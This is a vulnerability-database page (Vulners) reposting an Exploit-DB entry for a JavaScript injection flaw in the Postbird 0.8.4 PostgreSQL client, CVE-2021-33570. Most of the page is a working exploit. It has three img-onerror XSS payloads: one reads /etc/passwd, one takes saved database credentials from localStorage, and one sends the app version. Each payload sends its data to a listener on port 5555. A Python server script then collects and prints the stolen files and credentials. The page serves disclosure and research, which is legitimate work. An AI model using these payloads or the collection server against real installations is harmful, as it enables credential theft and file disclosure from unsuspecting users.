Vulners
Lucene search
Postbird 0.8.4 - Javascript Injection Exploit
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2021-33570 | 28 May 202101:19 | – | circl |
 | postbird 跨站脚本漏洞 | 25 May 202100:00 | – | cnnvd |
 | CVE-2021-33570 | 25 May 202121:06 | – | cve |
 | CVE-2021-33570 | 25 May 202121:06 | – | cvelist |
 | Postbird 0.8.4 - Javascript Injection | 27 May 202100:00 | – | exploitdb |
 | EUVD-2021-20258 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-33570 | 25 May 202122:15 | – | nvd |
 | CVE-2021-33570 | 25 May 202122:15 | – | osv |
 | Postbird 0.8.4 Cross Site Scripting / Local File Inclusion | 27 May 202100:00 | – | packetstorm |
 | Cross site scripting | 25 May 202122:15 | – | prion |
10
# Exploit Title: Postbird 0.8.4 - Javascript Injection
# Exploit Author: Debshubra Chakraborty
# Vendor Homepage: https://github.com/paxa/postbird
# Software Link: https://www.electronjs.org/apps/postbird
# Version: 0.8.4
# Tested on: Linux
# CVE : CVE-2021-33570
"""
XSS Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">
LFI Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">
PostgreSQL Password Stealing Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse
import re
hostName = '0.0.0.0'
serverPort = 5555
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
parse(urllib.parse.unquote(self.requestline))
def log_message(self, format, *args):
return
def parse(data):
expression = re.search('\S+=', data)
attr = expression.group()
if attr[2:len(attr)-1] == 'file':
data = data[12:len(data)-11]
data = data.rsplit('\\n')
print(f'\n[+] File received from LFI: \n\n')
for output in data:
print(output)
elif attr[2:len(attr)-1] == 'xss':
data = data[11:len(data)-10]
print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
elif attr[2:len(attr)-1] == 'credentials':
pos = re.search('{"\S+:', data)
data = data[pos.start():len(data)-11]
for i in range(2, len(data), 1):
if data[i] == '"':
pos = i
break
host = data[2:pos]
data = data[14:]
data = data.rsplit(',')
print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
for output in data:
print(output)
else:
print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
def main():
global hostName, serverPort
webServer = HTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("\nServer stopped.")
if __name__ == "__main__":
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 May 2021 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 23.5
CVSS 3.15.4
EPSS0.03561